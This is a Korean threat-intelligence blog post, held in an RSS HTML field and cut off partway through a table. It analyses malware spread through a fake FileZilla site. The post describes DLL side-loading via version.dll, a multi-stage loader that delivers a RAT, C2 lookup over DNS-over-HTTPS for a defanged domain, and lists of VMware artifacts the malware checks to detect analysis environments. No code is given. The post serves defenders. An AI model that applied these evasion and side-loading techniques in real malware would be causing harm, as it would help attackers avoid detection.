      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1577&quot; data-origin-height=&quot;656&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cl54i8/dJMcaaYRxl0/IFztbZh2x9fEYlciYlRnhk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cl54i8/dJMcaaYRxl0/IFztbZh2x9fEYlciYlRnhk/img.png&quot; data-alt=&quot;[이미지] 생성형 AI 제작&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cl54i8/dJMcaaYRxl0/IFztbZh2x9fEYlciYlRnhk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcl54i8%2FdJMcaaYRxl0%2FIFztbZh2x9fEYlciYlRnhk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1577&quot; height=&quot;656&quot; data-origin-width=&quot;1577&quot; data-origin-height=&quot;656&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 생성형 AI 제작&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 오픈소스&lt;span&gt; FTP &lt;/span&gt;클라이언트인&lt;span&gt;&amp;nbsp;FileZilla&lt;/span&gt;의 공식사이트를 위장한 가짜 웹사이트를 통해 악성코드를 유포하는 공격이 확인되었습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자는 정상&lt;span&gt; FileZilla &lt;/span&gt;프로그램에 악성&lt;span&gt; DLL &lt;/span&gt;파일을 포함하여 배포하였으며&lt;span&gt;, &lt;/span&gt;이로 인해 사용자가 프로그램을 실행할 경우 정상적인 동작과 더불어 악성코드가 함께 실행되는 방식입니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; margin: 30px 0px 15px; border-bottom: 1px solid #e0e0e0; font-family: Pretendard, sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size20&quot;&gt;유포 방식 및 공격 흐름&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자는&lt;span&gt; FileZilla &lt;/span&gt;공식 사이트의 디자인을 정교하게 복제한 가짜 웹사이트를 운영하며&lt;span&gt;, &lt;/span&gt;악성&lt;span&gt; DLL &lt;/span&gt;파일이 포함된 설치 파일을 배포했습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1094&quot; data-origin-height=&quot;649&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bsqpH3/dJMcad2jopG/Y0DHUKCHIiMmx90bcoMT7K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bsqpH3/dJMcad2jopG/Y0DHUKCHIiMmx90bcoMT7K/img.png&quot; data-alt=&quot;[그림 1] 가짜 FileZilla 사이트&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bsqpH3/dJMcad2jopG/Y0DHUKCHIiMmx90bcoMT7K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbsqpH3%2FdJMcad2jopG%2FY0DHUKCHIiMmx90bcoMT7K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1094&quot; height=&quot;649&quot; data-origin-width=&quot;1094&quot; data-origin-height=&quot;649&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] 가짜 FileZilla 사이트&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;분석 과정에서 확인된 샘플은 배포 형태에 따라 두 가지 유형으로 구분됩니다&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;Case1 &amp;ndash; 악성 DLL 파일이 포함된 압축파일&lt;/b&gt;&lt;br /&gt;초기 공격에서는&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&amp;nbsp;FileZilla 3.69.5 Portable &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;버전에 악성&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; DLL(version.dll) &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일을 추가한 압축 파일 형태로 배포되었습니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;885&quot; data-origin-height=&quot;619&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/X90FK/dJMcaaxOJTe/HumPSHxhFJaWGAoyyWYsgk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/X90FK/dJMcaaxOJTe/HumPSHxhFJaWGAoyyWYsgk/img.png&quot; data-alt=&quot;[그림 2] 악성 DLL 파일이 추가된 FileZilla 압축파일&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/X90FK/dJMcaaxOJTe/HumPSHxhFJaWGAoyyWYsgk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FX90FK%2FdJMcaaxOJTe%2FHumPSHxhFJaWGAoyyWYsgk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;885&quot; height=&quot;619&quot; data-origin-width=&quot;885&quot; data-origin-height=&quot;619&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 2] 악성 DLL 파일이 추가된 FileZilla 압축파일&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자가 압축을 해제하고 &lt;span&gt;FileZilla &lt;/span&gt;파일을 실행하면&lt;span&gt;, &lt;/span&gt;윈도우의&lt;span&gt; DLL &lt;/span&gt;로딩 우선순위를 악용한 사이드로딩&lt;span&gt;(Side-loading) &lt;/span&gt;기법에 의해 악성 코드가 함께 실행됩니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;DLL &lt;/span&gt;사이드로딩&lt;span&gt;(Sideloading)&lt;/span&gt;&lt;/b&gt;은 &lt;span&gt;Windows&lt;/span&gt;의&lt;span&gt; DLL &lt;/span&gt;검색 순서&lt;span&gt;(DLL Search Order)&lt;/span&gt;를 악용하는 공격 기법입니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;프로그램 실행 시 필요한&lt;span&gt; DLL&lt;/span&gt;을 찾기 위해 여러 경로를 검색하는데&lt;span&gt;, &lt;/span&gt;정상 프로그램과 동일한 경로내 악성&lt;span&gt; DLL &lt;/span&gt;파일을 위치시켜 악성 &lt;span&gt;DLL &lt;/span&gt;파일이 먼저 로드되도록 조작하는 방식입니다&lt;span&gt;.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;Case2 &amp;ndash; 악성 DLL 파일이 삽입된 실행 파일(EXE)&lt;/b&gt;&lt;br /&gt;최근에는 정상 FileZilla 설치 프로그램과 악성 DLL을 하나로 합친 단일 실행 파일 형태로 유포되었습니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;888&quot; data-origin-height=&quot;535&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bVX9fR/dJMcahwWD6w/5lgdFUNi7kPKj3KkuLF7n1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bVX9fR/dJMcahwWD6w/5lgdFUNi7kPKj3KkuLF7n1/img.png&quot; data-alt=&quot;[그림 3] 악성 설치파일(좌)과 정상 설치파일(우) 비교&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bVX9fR/dJMcahwWD6w/5lgdFUNi7kPKj3KkuLF7n1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbVX9fR%2FdJMcahwWD6w%2F5lgdFUNi7kPKj3KkuLF7n1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;888&quot; height=&quot;535&quot; data-origin-width=&quot;888&quot; data-origin-height=&quot;535&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 3] 악성 설치파일(좌)과 정상 설치파일(우) 비교&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 파일을 실행하면 정상적인 설치 과정이 진행됨과 동시에&lt;span&gt;, &lt;/span&gt;악성&lt;span&gt; DLL&lt;/span&gt;이 설치 경로에 생성&lt;span&gt;(Drop)&lt;/span&gt;되고&lt;span&gt;, &lt;/span&gt;이후&lt;span&gt; FileZilla &lt;/span&gt;실행 시 악성&lt;span&gt; DLL&lt;/span&gt;이 로드되어 실행되는 방식입니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; margin: 30px 0px 15px; border-bottom: 1px solid #e0e0e0; font-family: Pretendard, sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size20&quot;&gt;상세 분석&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;①&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;다단계 로더&lt;span&gt;(Multi-stage Loader) &lt;/span&gt;구조&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실행된 악성&lt;span&gt; DLL &lt;/span&gt;파일은 로더&lt;span&gt;(Loader) &lt;/span&gt;역할을 수행하며 보안 탐지를 피하기 위해 다단계 로더&lt;span&gt;(Multi-stage Loader ) &lt;/span&gt;구조를 거치게 됩니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;각 단계의 로더는 메모리 상에서 암호화된 다음 단계 데이터를 복호화하여 로드하며&lt;span&gt;, &lt;/span&gt;최종적으로 &lt;span&gt;RAT(Remote Access Trojan) &lt;/span&gt;페이로드를 실행합니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;FileZilla &lt;/span&gt;실행 &lt;span&gt;&amp;rarr;&lt;/span&gt; 악성&lt;span&gt; version.dll &lt;/span&gt;로드 &lt;span&gt;&amp;rarr;&lt;/span&gt; &lt;span&gt;Stage2 Loader &lt;/span&gt;&lt;span&gt;&amp;rarr; &lt;/span&gt;&lt;span&gt;Stage3 Loader &lt;/span&gt;&lt;span&gt;&amp;rarr;&lt;/span&gt; &lt;span&gt;Stage4 Loader &lt;/span&gt;&lt;span&gt;&amp;rarr;&lt;/span&gt; 페이로드&lt;span&gt;(RAT) &lt;/span&gt;실행&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;②&amp;nbsp; DoH(DNS-over-HTTPS) &lt;/span&gt;기반&lt;span&gt; C2 &lt;/span&gt;통신&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자는 네트워크 보안 장비의&lt;span&gt; DNS &lt;/span&gt;기반 모니터링을 우회하기 위해&lt;span&gt; DoH &lt;/span&gt;기술을 활용했습니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;DoH &lt;/span&gt;기술은 &lt;span&gt;DNS &lt;/span&gt;쿼리를 암호화된&lt;span&gt; HTTPS &lt;/span&gt;트래픽으로 전송하는 기술로 악성 로더는&lt;span&gt;Cloudflare&lt;/span&gt;의 공용 리졸버인&lt;span&gt; hxxps://1.1.1.1/dns-query&lt;/span&gt;에&lt;span&gt; HTTPS &lt;/span&gt;요청을 전송하여&lt;span&gt; C2 &lt;/span&gt;도메인인&lt;span&gt; welcome.supp0v3[.]com&lt;/span&gt;의&lt;span&gt; IP &lt;/span&gt;주소를 확인합니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이러한 방식은 텍스트 형태의&lt;span&gt; DNS &lt;/span&gt;쿼리가 아닌 암호화된&lt;span&gt; HTTPS &lt;/span&gt;트래픽으로 위장하여&lt;span&gt; DNS &lt;/span&gt;모니터링을 회피하고&lt;span&gt;, &lt;/span&gt;보안 장비가 &lt;span&gt;53&lt;/span&gt;번 포트&lt;span&gt;(DNS &lt;/span&gt;표준포트&lt;span&gt;) &lt;/span&gt;트래픽을 검사하거나 특정 도메인을 차단하더라도&lt;span&gt;, DoH &lt;/span&gt;요청은 신뢰할 수 있는 서비스&lt;span&gt;(Cloudflare)&lt;/span&gt;로 향하는 정상적인 웹 트래픽으로 간주되어&lt;span&gt; DNS &lt;/span&gt;기반 차단을 우회할 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;③&amp;nbsp; &lt;/span&gt;유입 경로 식별 파라미터를 활용한 조직적 운영 체계&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;C2 &lt;/span&gt;통신 과정에서 사용되는&lt;span&gt; JSON &lt;/span&gt;데이터를 분석한 결과 &lt;span&gt;utm_tag, utm_source, referrer &lt;/span&gt;등의 파라미터 조합이 확인되었습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;636&quot; data-origin-height=&quot;568&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/pqr1Z/dJMcaaLlj6P/KePLzU6knlsRvz5xrmMGkK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/pqr1Z/dJMcaaLlj6P/KePLzU6knlsRvz5xrmMGkK/img.png&quot; data-alt=&quot;[그림 4] case1( 위)과 case2(아래) JSON 비교&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/pqr1Z/dJMcaaLlj6P/KePLzU6knlsRvz5xrmMGkK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fpqr1Z%2FdJMcaaLlj6P%2FKePLzU6knlsRvz5xrmMGkK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;636&quot; height=&quot;568&quot; data-origin-width=&quot;636&quot; data-origin-height=&quot;568&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 4] case1( 위)과 case2(아래) JSON 비교&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Case1 &lt;br /&gt;{&quot;tag&quot;:&quot;tbs&quot;,&quot;referrer&quot;:&quot;&lt;b&gt;dll&lt;/b&gt;&quot;,&quot;callback&quot;:&quot;hxxps://welcome.supp0v3[.]com/d/callback?&lt;b&gt;utm_tag=tbs2&lt;/b&gt;&amp;amp;&lt;b&gt;utm_source=dll&lt;/b&gt;&quot;}&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;Case2&amp;nbsp; &lt;br /&gt;{&quot;tag&quot;:&quot;tbs&quot;,&quot;referrer&quot;:&quot;&lt;b&gt;FileZilla&lt;/b&gt;&quot;,&quot;callback&quot;:&quot;hxxps://welcome.supp0v3[.]com/d/callback&quot;}&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이는&amp;nbsp; 단순한&lt;span&gt; C2 &lt;/span&gt;통신이 아니라 공격자가 감염 경로와 피해자 그룹을 체계적으로 관리하고 있음을 시사하며&lt;span&gt;, &lt;/span&gt;이번 공격이 개인이 아닌 특정 공격 그룹의 의해 조직적으로 운영되고 있는 것으로 볼 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;④ &lt;/span&gt;&lt;b&gt;분석 환경 탐지 &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;악성&lt;span&gt; DLL &lt;/span&gt;파일에는 페이로드를 실행하기 전 분석 환경 여부를 체크하도록 설계된 여러 검사기능이 적용되어 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;시스템&lt;span&gt; BIOS &lt;/span&gt;버전&lt;span&gt;, &lt;/span&gt;제조업체 정보&lt;span&gt;(VMware, VirtualBox &lt;/span&gt;등&lt;span&gt;)&lt;/span&gt;를 조회하고&lt;span&gt;, &lt;/span&gt;프로세스 목록&lt;span&gt;, &lt;/span&gt;드라이버&lt;span&gt;, &lt;/span&gt;레지스트리 등&lt;span&gt; 18&lt;/span&gt;종의 항목을 체크하여 가상 환경 인지를 확인합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 98.4883%; height: 112px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 50%; height: 21px; text-align: center;&quot;&gt;프로세스명&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 21px; text-align: center;&quot;&gt;기능&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 50%; height: 23px; text-align: center;&quot;&gt;&lt;span&gt;vmtoolsd.exe&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 23px; text-align: center;&quot;&gt;&lt;span&gt;VMware Tools &lt;/span&gt;&lt;span&gt;데몬&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;
&lt;div&gt;&lt;span&gt;vmwaretray.exe&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;VMware System Tray&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;vmwareuser.exe&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;VMware User Process&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;
&lt;div&gt;&lt;span&gt;VGauthService.exe&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;VMware Guest Auth Service&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;vmacthlp.exe&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;VMware Activation Helper&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 1] &lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;프로세스 체크리스트&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;드라이버명&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;기능&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmnet.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;네트워크 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmmouse.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;가상 마우스 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmusb.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware USB &lt;/span&gt;&lt;span&gt;드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vm3dmp.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware SVGA II 3D &lt;/span&gt;&lt;span&gt;드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmci.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware VMCI &lt;/span&gt;&lt;span&gt;버스 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmhgfs.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware Host-Guest &lt;/span&gt;&lt;span&gt;파일시스템&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmmemctl.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;메모리 제어 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmx86.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;가상화 커널 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmrawdsk.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware Raw Disk &lt;/span&gt;&lt;span&gt;드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmusbmouse.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware USB HID &lt;/span&gt;&lt;span&gt;마우스 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmkdb.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;커널 디버거 관련&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmnetuserif.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;네트워크 유저 인터페이스 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
